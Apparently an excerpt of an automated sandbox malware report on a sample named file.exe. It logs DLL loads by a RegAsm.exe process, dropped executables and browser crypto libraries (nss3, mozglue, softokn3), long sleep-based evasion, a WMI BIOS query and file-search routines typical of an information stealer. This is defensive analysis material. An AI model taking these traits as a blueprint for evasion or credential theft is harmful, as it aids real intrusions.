Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mozglue.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wsock32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: vcruntime140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msvcp140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windowscodecs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: edputil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: appresolver.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: bcp47langs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: slc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sppc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: pcacli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntshrui.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: linkinfo.dll
Source: C:\ProgramData\KKJEBAAECB.exe Section loaded: mscoree.dll
Source: C:\ProgramData\KKJEBAAECB.exe Section loaded: apphelp.dll
Source: C:\ProgramData\KKJEBAAECB.exe Section loaded: kernel.appcore.dll
Source: C:\ProgramData\KKJEBAAECB.exe Section loaded: version.dll
Source: C:\ProgramData\KKJEBAAECB.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\KKJEBAAECB.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\ProgramData\KJKJJJECFI.exe Section loaded: mscoree.dll
Source: C:\ProgramData\KJKJJJECFI.exe Section loaded: apphelp.dll
Source: C:\ProgramData\KJKJJJECFI.exe Section loaded: kernel.appcore.dll
Source: C:\ProgramData\KJKJJJECFI.exe Section loaded: version.dll
Source: C:\ProgramData\KJKJJJECFI.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\KJKJJJECFI.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\KJKJJJECFI.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dbghelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: file.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: freebl3.pdb source: RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, freebl3[1].dll.2.dr
Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
Source: Binary string: freebl3.pdbp source: RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, freebl3[1].dll.2.dr
Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000002.00000002.2161621926.000000006C2FF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
Source: Binary string: c:\rje\tg\h2r2\obj\Re\ease\etf.pdb source: file.exe
Source: Binary string: softokn3.pdb@ source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: RegAsm.exe, 00000002.00000002.2148380649.0000000035593000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.2.dr, vcruntime140[1].dll.2.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: RegAsm.exe, 00000002.00000002.2142626224.00000000296BC000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.2.dr, msvcp140[1].dll.2.dr
Source: Binary string: nss3.pdb source: RegAsm.exe, 00000002.00000002.2161621926.000000006C2FF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2385875761.000000001DB7B000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.2.dr
Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
Source: Binary string: softokn3.pdb source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr
Source: Binary string: c:\rje\tg\obj\Re\ease\etf.pdb source: KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041616A GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 2_2_0041616A
Source: KJKJJJECFI.exe.2.dr Static PE information: real checksum: 0x32c4e should be: 0x31538
Source: sql[1].dll.2.dr Static PE information: real checksum: 0x0 should be: 0x263795
Source: file.exe Static PE information: real checksum: 0x2f063 should be: 0x3d94c
Source: 66d0cd9a65b5d_vqwergf[1].exe.2.dr Static PE information: real checksum: 0x32c4e should be: 0x31538
Source: KKJEBAAECB.exe.2.dr Static PE information: real checksum: 0x511fe should be: 0x5fee9
Source: 66d0cd8fb6f7b_lgjfd[1].exe.2.dr Static PE information: real checksum: 0x511fe should be: 0x5fee9
Source: freebl3[1].dll.2.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.2.dr Static PE information: section name: .00cfg
Source: msvcp140[1].dll.2.dr Static PE information: section name: .didat
Source: softokn3[1].dll.2.dr Static PE information: section name: .00cfg
Source: sql[1].dll.2.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.2.dr Static PE information: section name: .00cfg
Source: freebl3.dll.2.dr Static PE information: section name: .00cfg
Source: mozglue.dll.2.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.2.dr Static PE information: section name: .didat
Source: softokn3.dll.2.dr Static PE information: section name: .00cfg
Source: nss3.dll.2.dr Static PE information: section name: .00cfg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041AA05 push ecx; ret 2_2_0041AA18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C0FB536 push ecx; ret 2_2_6C0FB549
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0043504B push ss; retf 9_2_0043504F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_1DAB3C51 push es; retf 12_2_1DAB3C57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_1DB1DB66 push esp; retf 12_2_1DB1DB67
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_1DB1D561 push esp; retf 12_2_1DB1D570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_1DB2F456 push ebx; ret 12_2_1DB2F457
Source: file.exe Static PE information: section name: .text entropy: 7.988086899463732
Source: KKJEBAAECB.exe.2.dr Static PE information: section name: .text entropy: 7.99530141513891
Source: 66d0cd8fb6f7b_lgjfd[1].exe.2.dr Static PE information: section name: .text entropy: 7.99530141513891
Source: KJKJJJECFI.exe.2.dr Static PE information: section name: .text entropy: 7.988564984813096
Source: 66d0cd9a65b5d_vqwergf[1].exe.2.dr Static PE information: section name: .text entropy: 7.988564984813096
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\KKJEBAAECB.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\66d0cd9a65b5d_vqwergf[1].exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\66d0cd8fb6f7b_lgjfd[1].exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\KJKJJJECFI.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sql[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: 13E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: 2C10000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: 4C10000 memory reserve | memory write watch Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe Memory allocated: B60000 memory reserve | memory write watch Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe Memory allocated: 2580000 memory reserve | memory write watch Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe Memory allocated: B60000 memory reserve | memory write watch Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe Memory allocated: 840000 memory reserve | memory write watch Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe Memory allocated: 2580000 memory reserve | memory write watch Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe Memory allocated: 2390000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sql[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API coverage: 8.8 %
Source: C:\Users\user\Desktop\file.exe TID: 5228 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe TID: 5084 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1272 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe TID: 5408 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 4080 Thread sleep count: 90 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00413540 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,memset,lstrcatA,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose, 2_2_00413540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040B969 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_0040B969
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041425C wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 2_2_0041425C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00413B50 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 2_2_00413B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00409B68 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA, 2_2_00409B68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040AB08 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_0040AB08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00409317 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 2_2_00409317
